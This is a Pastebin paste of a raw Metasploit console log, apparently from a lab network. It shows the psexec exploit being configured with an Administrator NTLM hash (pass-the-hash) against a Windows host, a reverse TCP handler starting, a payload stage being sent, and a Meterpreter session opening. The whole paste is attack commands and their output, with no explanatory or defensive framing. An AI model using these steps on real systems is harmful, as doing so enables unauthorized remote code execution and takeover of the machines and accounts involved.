Advertisement
Guest User

Untitled

a guest
May 22nd, 2019
189
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.06 KB | None | 0 0
  1. msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
  2. msf5 exploit(windows/smb/psexec) > set rhost 192.168.149.145
  3. rhost => 192.168.149.145
  4. msf5 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
  5. SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
  6. msf5 exploit(windows/smb/psexec) > set SMBUser Administrator
  7. SMBUser => Administrator
  8. msf5 exploit(windows/smb/psexec) > exploit
  9.  
  10. [*] Started reverse TCP handler on 192.168.149.146:4444
  11. [*] 192.168.149.145:445 - Connecting to the server...
  12. [*] 192.168.149.145:445 - Authenticating to 192.168.149.145:445 as user 'Administrator'...
  13. [*] 192.168.149.145:445 - Selecting PowerShell target
  14. [*] 192.168.149.145:445 - Executing the payload...
  15. [+] 192.168.149.145:445 - Service start timed out, OK if running a command or non-service executable...
  16. [*] Sending stage (179779 bytes) to 192.168.149.145
  17. [*] Meterpreter session 1 opened (192.168.149.146:4444 -> 192.168.149.145:49164) at 2019-05-22 17:42:45 +0000
  18.  
  19. meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement